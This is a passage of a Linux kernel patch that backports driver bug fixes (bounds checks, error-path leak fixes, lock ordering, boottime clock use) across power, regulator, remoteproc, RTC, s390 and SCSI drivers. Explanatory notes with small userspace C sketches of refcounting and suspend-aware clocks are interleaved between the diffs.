+@@ -1272,15 +1195,6 @@ static int psy_register_thermal(struct power_supply *psy)
+ static void psy_unregister_thermal(struct power_supply *psy)
+ {
+ }
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-}
+ #endif
+ 
+ static struct power_supply *__must_check
+@@ -1354,10 +1268,6 @@ __power_supply_register(struct device *parent,
+ 	if (rc)
+ 		goto register_thermal_failed;
+ 
+-	rc = psy_register_cooler(psy);
+-	if (rc)
+-		goto register_cooler_failed;
+-
+ 	rc = power_supply_create_triggers(psy);
+ 	if (rc)
+ 		goto create_triggers_failed;
+@@ -1387,8 +1297,6 @@ __power_supply_register(struct device *parent,
+ add_hwmon_sysfs_failed:
+ 	power_supply_remove_triggers(psy);
+ create_triggers_failed:
+-	psy_unregister_cooler(psy);
+-register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+ wakeup_init_failed:
+@@ -1540,7 +1448,6 @@ void power_supply_unregister(struct power_supply *psy)
+ 	sysfs_remove_link(&psy->dev.kobj, "powers");
+ 	power_supply_remove_hwmon_sysfs(psy);
+ 	power_supply_remove_triggers(psy);
+-	psy_unregister_cooler(psy);
+ 	psy_unregister_thermal(psy);
+ 	device_init_wakeup(&psy->dev, false);
+ 	device_unregister(&psy->dev);
+diff --git a/drivers/powercap/powercap_sys.c b/drivers/powercap/powercap_sys.c
+index 1f968353d4799..e180dee0f83d0 100644
+--- a/drivers/powercap/powercap_sys.c
++++ b/drivers/powercap/powercap_sys.c
+@@ -530,9 +530,6 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->name = kstrdup(name, GFP_KERNEL);
+ 	if (!power_zone->name)
+ 		goto err_name_alloc;
+-	dev_set_name(&power_zone->dev, "%s:%x",
+-					dev_name(power_zone->dev.parent),
+-					power_zone->id);
+ 	power_zone->constraints = kcalloc(nr_constraints,
+ 					  sizeof(*power_zone->constraints),
+ 					  GFP_KERNEL);
+@@ -555,9 +552,16 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->dev_attr_groups[0] = &power_zone->dev_zone_attr_group;
+ 	power_zone->dev_attr_groups[1] = NULL;
+ 	power_zone->dev.groups = power_zone->dev_attr_groups;
++	dev_set_name(&power_zone->dev, "%s:%x",
++					dev_name(power_zone->dev.parent),
++					power_zone->id);
+ 	result = device_register(&power_zone->dev);
+-	if (result)
+-		goto err_dev_ret;
++	if (result) {
++		put_device(&power_zone->dev);
++		mutex_unlock(&control_type->lock);
++
++		return ERR_PTR(result);
++	}
+ 
+ 	control_type->nr_zones++;
+ 	mutex_unlock(&control_type->lock);
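
[Note: two fixes here: dev_set_name() moves to just before device_register() so the name exists when the device is added, and a failed device_register() is answered with put_device() rather than a plain free, since the embedded kobject may already hold references. A rough refcount sketch, not the real driver-model API.]

#include <stdio.h>
#include <stdlib.h>

struct toy_dev {
	int refs;
	char name[32];
};

static void put_device(struct toy_dev *d)
{
	if (--d->refs == 0) {
		printf("releasing %s\n", d->name);
		free(d);
	}
}

static int device_register(struct toy_dev *d)
{
	d->refs++;		/* registration can take references... */
	put_device(d);		/* ...and drop them again on failure */
	return -1;		/* simulate failure */
}

int main(void)
{
	struct toy_dev *d = calloc(1, sizeof(*d));

	if (!d)
		return 1;
	d->refs = 1;		/* device_initialize() analog */
	snprintf(d->name, sizeof(d->name), "zone:%x", 0);	/* name first */
	if (device_register(d))
		put_device(d);	/* correct: let the refcount free it */
	return 0;
}
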
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index ae69e493913da..4fcd36055b025 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1584,7 +1584,7 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+@@ -2673,7 +2673,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 		 * this regulator was disabled.
+ 		 */
+ 		ktime_t end = ktime_add_us(rdev->last_off, rdev->desc->off_on_delay);
+-		s64 remaining = ktime_us_delta(end, ktime_get());
++		s64 remaining = ktime_us_delta(end, ktime_get_boottime());
+ 
+ 		if (remaining > 0)
+ 			_regulator_delay_helper(remaining);
+@@ -2912,7 +2912,7 @@ static int _regulator_do_disable(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	trace_regulator_disable_complete(rdev_get_name(rdev));
+ 
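
[Note: the off_on_delay bookkeeping switches from ktime_get() to ktime_get_boottime() because the monotonic clock stops during suspend; a regulator switched off just before suspend would otherwise appear to still need its full off-to-on delay long after it had elapsed in wall time. A userspace look at the two clocks; CLOCK_BOOTTIME is Linux-specific.]

#define _GNU_SOURCE
#include <stdio.h>
#include <time.h>

static long long ns(clockid_t id)
{
	struct timespec ts;

	clock_gettime(id, &ts);
	return ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

int main(void)
{
	/* CLOCK_MONOTONIC (ktime_get) pauses across suspend;
	 * CLOCK_BOOTTIME (ktime_get_boottime) keeps counting. */
	printf("monotonic: %lld ns\n", ns(CLOCK_MONOTONIC));
	printf("boottime:  %lld ns\n", ns(CLOCK_BOOTTIME));
	return 0;
}
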
+diff --git a/drivers/regulator/max77802-regulator.c b/drivers/regulator/max77802-regulator.c
+index 21e0eb0f43f94..befe5f319819b 100644
+--- a/drivers/regulator/max77802-regulator.c
++++ b/drivers/regulator/max77802-regulator.c
+@@ -94,9 +94,11 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ {
+ 	unsigned int val = MAX77802_OFF_PWRREQ;
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -110,7 +112,7 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
+@@ -127,6 +129,9 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ 		return -EINVAL;
+ 	}
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -135,8 +140,10 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ static unsigned max77802_get_mode(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	return max77802_map_mode(max77802->opmode[id]);
+ }
+ 
+@@ -160,10 +167,13 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ 				     unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the regulator has been disabled for suspend
+ 	 * then is invalid to try setting a suspend mode.
+@@ -209,9 +219,11 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ static int max77802_enable(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	if (max77802->opmode[id] == MAX77802_OFF_PWRREQ)
+ 		max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+ 
+@@ -495,7 +507,7 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < MAX77802_REG_MAX; i++) {
+ 		struct regulator_dev *rdev;
+-		int id = regulators[i].id;
++		unsigned int id = regulators[i].id;
+ 		int shift = max77802_get_opmode_shift(id);
+ 		int ret;
+ 
+@@ -513,10 +525,12 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 		 * the hardware reports OFF as the regulator operating mode.
+ 		 * Default to operating mode NORMAL in that case.
+ 		 */
+-		if (val == MAX77802_STATUS_OFF)
+-			max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+-		else
+-			max77802->opmode[id] = val;
++		if (id < ARRAY_SIZE(max77802->opmode)) {
++			if (val == MAX77802_STATUS_OFF)
++				max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
++			else
++				max77802->opmode[id] = val;
++		}
+ 
+ 		rdev = devm_regulator_register(&pdev->dev,
+ 					       &regulators[i], &config);
+diff --git a/drivers/regulator/s5m8767.c b/drivers/regulator/s5m8767.c
+index 35269f9982105..754c6fcc6e642 100644
+--- a/drivers/regulator/s5m8767.c
++++ b/drivers/regulator/s5m8767.c
+@@ -923,10 +923,14 @@ static int s5m8767_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < pdata->num_regulators; i++) {
+ 		const struct sec_voltage_desc *desc;
+-		int id = pdata->regulators[i].id;
++		unsigned int id = pdata->regulators[i].id;
+ 		int enable_reg, enable_val;
+ 		struct regulator_dev *rdev;
+ 
++		BUILD_BUG_ON(ARRAY_SIZE(regulators) != ARRAY_SIZE(reg_voltage_map));
++		if (WARN_ON_ONCE(id >= ARRAY_SIZE(regulators)))
++			continue;
++
+ 		desc = reg_voltage_map[id];
+ 		if (desc) {
+ 			regulators[id].n_voltages =
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index c484c943e4675..58f6541b6417b 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -173,24 +173,6 @@ static unsigned int tps65219_get_mode(struct regulator_dev *dev)
+ 		return REGULATOR_MODE_NORMAL;
+ }
+ 
+-/*
+- * generic regulator_set_bypass_regmap does not fully match requirements
+- * TPS65219 Requires explicitly that regulator is disabled before switch
+- */
+-static int tps65219_set_bypass(struct regulator_dev *dev, bool enable)
+-{
+-	struct tps65219 *tps = rdev_get_drvdata(dev);
+-	unsigned int rid = rdev_get_id(dev);
+-
+-	if (dev->desc->ops->is_enabled(dev)) {
+-		dev_err(tps->dev,
+-			"%s LDO%d enabled, must be shut down to set bypass ",
+-			__func__, rid);
+-		return -EBUSY;
+-	}
+-	return regulator_set_bypass_regmap(dev, enable);
+-}
+-
+ /* Operations permitted on BUCK1/2/3 */
+ static const struct regulator_ops tps65219_bucks_ops = {
+ 	.is_enabled		= regulator_is_enabled_regmap,
+@@ -217,7 +199,7 @@ static const struct regulator_ops tps65219_ldos_1_2_ops = {
+ 	.set_voltage_sel	= regulator_set_voltage_sel_regmap,
+ 	.list_voltage		= regulator_list_voltage_linear_range,
+ 	.map_voltage		= regulator_map_voltage_linear_range,
+-	.set_bypass		= tps65219_set_bypass,
++	.set_bypass		= regulator_set_bypass_regmap,
+ 	.get_bypass		= regulator_get_bypass_regmap,
+ };
+ 
+@@ -367,7 +349,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].type = irq_type;
+ 
+ 		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
+-		if (rdev < 0) {
++		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
+ 			return -EINVAL;
+diff --git a/drivers/remoteproc/mtk_scp_ipi.c b/drivers/remoteproc/mtk_scp_ipi.c
+index 00f041ebcde63..4c0d121c2f54d 100644
+--- a/drivers/remoteproc/mtk_scp_ipi.c
++++ b/drivers/remoteproc/mtk_scp_ipi.c
+@@ -164,21 +164,21 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 	    WARN_ON(len > sizeof(send_obj->share_buf)) || WARN_ON(!buf))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&scp->send_lock);
+-
+ 	ret = clk_prepare_enable(scp->clk);
+ 	if (ret) {
+ 		dev_err(scp->dev, "failed to enable clock\n");
+-		goto unlock_mutex;
++		return ret;
+ 	}
+ 
++	mutex_lock(&scp->send_lock);
++
+ 	 /* Wait until SCP receives the last command */
+ 	timeout = jiffies + msecs_to_jiffies(2000);
+ 	do {
+ 		if (time_after(jiffies, timeout)) {
+ 			dev_err(scp->dev, "%s: IPI timeout!\n", __func__);
+ 			ret = -ETIMEDOUT;
+-			goto clock_disable;
++			goto unlock_mutex;
+ 		}
+ 	} while (readl(scp->reg_base + scp->data->host_to_scp_reg));
+ 
+@@ -205,10 +205,9 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 			ret = 0;
+ 	}
+ 
+-clock_disable:
+-	clk_disable_unprepare(scp->clk);
+ unlock_mutex:
+ 	mutex_unlock(&scp->send_lock);
++	clk_disable_unprepare(scp->clk);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/remoteproc/qcom_q6v5_mss.c b/drivers/remoteproc/qcom_q6v5_mss.c
+index fddb63cffee07..7dbab5fcbe1e7 100644
+--- a/drivers/remoteproc/qcom_q6v5_mss.c
++++ b/drivers/remoteproc/qcom_q6v5_mss.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/devcoredump.h>
+-#include <linux/dma-map-ops.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/kernel.h>
+@@ -18,6 +17,7 @@
+ #include <linux/module.h>
+ #include <linux/of_address.h>
+ #include <linux/of_device.h>
++#include <linux/of_reserved_mem.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_runtime.h>
+@@ -211,6 +211,9 @@ struct q6v5 {
+ 	size_t mba_size;
+ 	size_t dp_size;
+ 
++	phys_addr_t mdata_phys;
++	size_t mdata_size;
++
+ 	phys_addr_t mpss_phys;
+ 	phys_addr_t mpss_reloc;
+ 	size_t mpss_size;
+@@ -933,52 +936,47 @@ static void q6v5proc_halt_axi_port(struct q6v5 *qproc,
+ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 				const char *fw_name)
+ {
+-	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS | DMA_ATTR_NO_KERNEL_MAPPING;
+-	unsigned long flags = VM_DMA_COHERENT | VM_FLUSH_RESET_PERMS;
+-	struct page **pages;
+-	struct page *page;
++	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS;
+ 	dma_addr_t phys;
+ 	void *metadata;
+ 	int mdata_perm;
+ 	int xferop_ret;
+ 	size_t size;
+-	void *vaddr;
+-	int count;
++	void *ptr;
+ 	int ret;
+-	int i;
+ 
+ 	metadata = qcom_mdt_read_metadata(fw, &size, fw_name, qproc->dev);
+ 	if (IS_ERR(metadata))
+ 		return PTR_ERR(metadata);
+ 
+-	page = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
+-	if (!page) {
+-		kfree(metadata);
+-		dev_err(qproc->dev, "failed to allocate mdt buffer\n");
+-		return -ENOMEM;
+-	}
+-
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		ret = -ENOMEM;
+-		goto free_dma_attrs;
+-	}
+-
+-	for (i = 0; i < count; i++)
+-		pages[i] = nth_page(page, i);
++	if (qproc->mdata_phys) {
++		if (size > qproc->mdata_size) {
++			ret = -EINVAL;
++			dev_err(qproc->dev, "metadata size outside memory range\n");
++			goto free_metadata;
++		}
+ 
+-	vaddr = vmap(pages, count, flags, pgprot_dmacoherent(PAGE_KERNEL));
+-	kfree(pages);
+-	if (!vaddr) {
+-		dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n", &phys, size);
+-		ret = -EBUSY;
+-		goto free_dma_attrs;
++		phys = qproc->mdata_phys;
++		ptr = memremap(qproc->mdata_phys, size, MEMREMAP_WC);
++		if (!ptr) {
++			ret = -EBUSY;
++			dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n",
++				&qproc->mdata_phys, size);
++			goto free_metadata;
++		}
++	} else {
++		ptr = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
++		if (!ptr) {
++			ret = -ENOMEM;
++			dev_err(qproc->dev, "failed to allocate mdt buffer\n");
++			goto free_metadata;
++		}
+ 	}
+ 
+-	memcpy(vaddr, metadata, size);
++	memcpy(ptr, metadata, size);
+ 
+-	vunmap(vaddr);
++	if (qproc->mdata_phys)
++		memunmap(ptr);
+ 
+ 	/* Hypervisor mapping to access metadata by modem */
+ 	mdata_perm = BIT(QCOM_SCM_VMID_HLOS);
+@@ -1008,7 +1006,9 @@ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 			 "mdt buffer not reclaimed system may become unstable\n");
+ 
+ free_dma_attrs:
+-	dma_free_attrs(qproc->dev, size, page, phys, dma_attrs);
++	if (!qproc->mdata_phys)
++		dma_free_attrs(qproc->dev, size, ptr, phys, dma_attrs);
++free_metadata:
+ 	kfree(metadata);
+ 
+ 	return ret < 0 ? ret : 0;
+@@ -1836,6 +1836,7 @@ static int q6v5_init_reset(struct q6v5 *qproc)
+ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ {
+ 	struct device_node *child;
++	struct reserved_mem *rmem;
+ 	struct device_node *node;
+ 	struct resource r;
+ 	int ret;
+@@ -1882,6 +1883,26 @@ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ 	qproc->mpss_phys = qproc->mpss_reloc = r.start;
+ 	qproc->mpss_size = resource_size(&r);
+ 
++	if (!child) {
++		node = of_parse_phandle(qproc->dev->of_node, "memory-region", 2);
++	} else {
++		child = of_get_child_by_name(qproc->dev->of_node, "metadata");
++		node = of_parse_phandle(child, "memory-region", 0);
++		of_node_put(child);
++	}
++
++	if (!node)
++		return 0;
++
++	rmem = of_reserved_mem_lookup(node);
++	if (!rmem) {
++		dev_err(qproc->dev, "unable to resolve metadata region\n");
++		return -EINVAL;
++	}
++
++	qproc->mdata_phys = rmem->base;
++	qproc->mdata_size = rmem->size;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 115c0a1eddb10..35df1b0a515bf 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -954,6 +954,7 @@ static void qcom_glink_handle_intent(struct qcom_glink *glink,
+ 	spin_unlock_irqrestore(&glink->idr_lock, flags);
+ 	if (!channel) {
+ 		dev_err(glink->dev, "intents for non-existing channel\n");
++		qcom_glink_rx_advance(glink, ALIGN(msglen, 8));
+ 		return;
+ 	}
+ 
+@@ -1446,6 +1447,7 @@ static void qcom_glink_rpdev_release(struct device *dev)
+ {
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+@@ -1689,6 +1691,7 @@ static void qcom_glink_device_release(struct device *dev)
+ 
+ 	/* Release qcom_glink_alloc_channel() reference */
+ 	kref_put(&channel->refcount, qcom_glink_channel_release);
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+diff --git a/drivers/rtc/rtc-pm8xxx.c b/drivers/rtc/rtc-pm8xxx.c
+index 716e5d9ad74d1..d114f0da537d2 100644
+--- a/drivers/rtc/rtc-pm8xxx.c
++++ b/drivers/rtc/rtc-pm8xxx.c
+@@ -221,7 +221,6 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ {
+ 	int rc, i;
+ 	u8 value[NUM_8_BIT_RTC_REGS];
+-	unsigned int ctrl_reg;
+ 	unsigned long secs, irq_flags;
+ 	struct pm8xxx_rtc *rtc_dd = dev_get_drvdata(dev);
+ 	const struct pm8xxx_rtc_regs *regs = rtc_dd->regs;
+@@ -233,6 +232,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		secs >>= 8;
+ 	}
+ 
++	rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++				regs->alarm_en, 0);
++	if (rc)
++		return rc;
++
+ 	spin_lock_irqsave(&rtc_dd->ctrl_reg_lock, irq_flags);
+ 
+ 	rc = regmap_bulk_write(rtc_dd->regmap, regs->alarm_rw, value,
+@@ -242,19 +246,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		goto rtc_rw_fail;
+ 	}
+ 
+-	rc = regmap_read(rtc_dd->regmap, regs->alarm_ctrl, &ctrl_reg);
+-	if (rc)
+-		goto rtc_rw_fail;
+-
+-	if (alarm->enabled)
+-		ctrl_reg |= regs->alarm_en;
+-	else
+-		ctrl_reg &= ~regs->alarm_en;
+-
+-	rc = regmap_write(rtc_dd->regmap, regs->alarm_ctrl, ctrl_reg);
+-	if (rc) {
+-		dev_err(dev, "Write to RTC alarm control register failed\n");
+-		goto rtc_rw_fail;
++	if (alarm->enabled) {
++		rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++					regs->alarm_en, regs->alarm_en);
++		if (rc)
++			goto rtc_rw_fail;
+ 	}
+ 
+ 	dev_dbg(dev, "Alarm Set for h:m:s=%ptRt, y-m-d=%ptRdr\n",
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 5d0b9991e91a4..b20ce86b97b29 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -6956,8 +6956,10 @@ dasd_eckd_init(void)
+ 		return -ENOMEM;
+ 	dasd_vol_info_req = kmalloc(sizeof(*dasd_vol_info_req),
+ 				    GFP_KERNEL | GFP_DMA);
+-	if (!dasd_vol_info_req)
++	if (!dasd_vol_info_req) {
++		kfree(dasd_reserve_req);
+ 		return -ENOMEM;
++	}
+ 	pe_handler_worker = kmalloc(sizeof(*pe_handler_worker),
+ 				    GFP_KERNEL | GFP_DMA);
+ 	if (!pe_handler_worker) {
+diff --git a/drivers/s390/char/sclp_early.c b/drivers/s390/char/sclp_early.c
+index c1c70a161c0e2..f480d6c7fd399 100644
+--- a/drivers/s390/char/sclp_early.c
++++ b/drivers/s390/char/sclp_early.c
+@@ -163,7 +163,7 @@ static void __init sclp_early_console_detect(struct init_sccb *sccb)
+ 		sclp.has_linemode = 1;
+ }
+ 
+-void __init sclp_early_adjust_va(void)
++void __init __no_sanitize_address sclp_early_adjust_va(void)
+ {
+ 	sclp_early_sccb = __va((unsigned long)sclp_early_sccb);
+ }
+diff --git a/drivers/s390/cio/vfio_ccw_drv.c b/drivers/s390/cio/vfio_ccw_drv.c
+index 54aba7cceb33f..ff538a086fc77 100644
+--- a/drivers/s390/cio/vfio_ccw_drv.c
++++ b/drivers/s390/cio/vfio_ccw_drv.c
+@@ -225,7 +225,7 @@ static void vfio_ccw_sch_shutdown(struct subchannel *sch)
+ 	struct vfio_ccw_parent *parent = dev_get_drvdata(&sch->dev);
+ 	struct vfio_ccw_private *private = dev_get_drvdata(&parent->dev);
+ 
+-	if (WARN_ON(!private))
++	if (!private)
+ 		return;
+ 
+ 	vfio_ccw_fsm_event(private, VFIO_CCW_EVENT_CLOSE);
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 9c01957e56b3f..2bba5ed83dfcf 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -349,6 +349,8 @@ static int vfio_ap_validate_nib(struct kvm_vcpu *vcpu, dma_addr_t *nib)
+ {
+ 	*nib = vcpu->run->s.regs.gprs[2];
+ 
++	if (!*nib)
++		return -EINVAL;
+ 	if (kvm_is_error_hva(gfn_to_hva(vcpu->kvm, *nib >> PAGE_SHIFT)))
+ 		return -EINVAL;
+ 
+@@ -1857,8 +1859,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 		return ret;
+ 
+ 	q = kzalloc(sizeof(*q), GFP_KERNEL);
+-	if (!q)
+-		return -ENOMEM;
++	if (!q) {
++		ret = -ENOMEM;
++		goto err_remove_group;
++	}
+ 
+ 	q->apqn = to_ap_queue(&apdev->device)->qid;
+ 	q->saved_isc = VFIO_AP_ISC_INVALID;
+@@ -1876,6 +1880,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+ 	return 0;
++
++err_remove_group:
++	sysfs_remove_group(&apdev->device.kobj, &vfio_queue_attr_group);
++	return ret;
+ }
+ 
+ void vfio_ap_mdev_remove_queue(struct ap_device *apdev)
+diff --git a/drivers/scsi/aacraid/aachba.c b/drivers/scsi/aacraid/aachba.c
+index 4d4cb47b38467..24c049eff157a 100644
+--- a/drivers/scsi/aacraid/aachba.c
++++ b/drivers/scsi/aacraid/aachba.c
+@@ -818,8 +818,8 @@ static void aac_probe_container_scsi_done(struct scsi_cmnd *scsi_cmnd)
+ 
+ int aac_probe_container(struct aac_dev *dev, int cid)
+ {
+-	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd), GFP_KERNEL);
+-	struct aac_cmd_priv *cmd_priv = aac_priv(scsicmd);
++	struct aac_cmd_priv *cmd_priv;
++	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd) + sizeof(*cmd_priv), GFP_KERNEL);
+ 	struct scsi_device *scsidev = kzalloc(sizeof(*scsidev), GFP_KERNEL);
+ 	int status;
+ 
+@@ -838,6 +838,7 @@ int aac_probe_container(struct aac_dev *dev, int cid)
+ 		while (scsicmd->device == scsidev)
+ 			schedule();
+ 	kfree(scsidev);
++	cmd_priv = aac_priv(scsicmd);
+ 	status = cmd_priv->status;
+ 	kfree(scsicmd);
+ 	return status;
+diff --git a/drivers/scsi/aic94xx/aic94xx_task.c b/drivers/scsi/aic94xx/aic94xx_task.c
+index ed119a3f6f2ed..7f02083001100 100644
+--- a/drivers/scsi/aic94xx/aic94xx_task.c
++++ b/drivers/scsi/aic94xx/aic94xx_task.c
+@@ -50,6 +50,9 @@ static int asd_map_scatterlist(struct sas_task *task,
+ 		dma_addr_t dma = dma_map_single(&asd_ha->pcidev->dev, p,
+ 						task->total_xfer_len,
+ 						task->data_dir);
++		if (dma_mapping_error(&asd_ha->pcidev->dev, dma))
++			return -ENOMEM;
++
+ 		sg_arr[0].bus_addr = cpu_to_le64((u64)dma);
+ 		sg_arr[0].size = cpu_to_le32(task->total_xfer_len);
+ 		sg_arr[0].flags |= ASD_SG_EL_LIST_EOL;
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 182aaae603868..55a0d4013439f 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -20819,6 +20819,7 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	struct lpfc_mbx_wr_object *wr_object;
+ 	LPFC_MBOXQ_t *mbox;
+ 	int rc = 0, i = 0;
++	int mbox_status = 0;
+ 	uint32_t shdr_status, shdr_add_status, shdr_add_status_2;
+ 	uint32_t shdr_change_status = 0, shdr_csf = 0;
+ 	uint32_t mbox_tmo;
+@@ -20864,11 +20865,15 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	wr_object->u.request.bde_count = i;
+ 	bf_set(lpfc_wr_object_write_length, &wr_object->u.request, written);
+ 	if (!phba->sli4_hba.intr_enable)
+-		rc = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
++		mbox_status = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
+ 	else {
+ 		mbox_tmo = lpfc_mbox_tmo_val(phba, mbox);
+-		rc = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
++		mbox_status = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
+ 	}
++
++	/* The mbox status needs to be maintained to detect MBOX_TIMEOUT. */
++	rc = mbox_status;
++
+ 	/* The IOCTL status is embedded in the mailbox subheader. */
+ 	shdr_status = bf_get(lpfc_mbox_hdr_status,
+ 			     &wr_object->header.cfg_shdr.response);
+@@ -20883,10 +20888,6 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
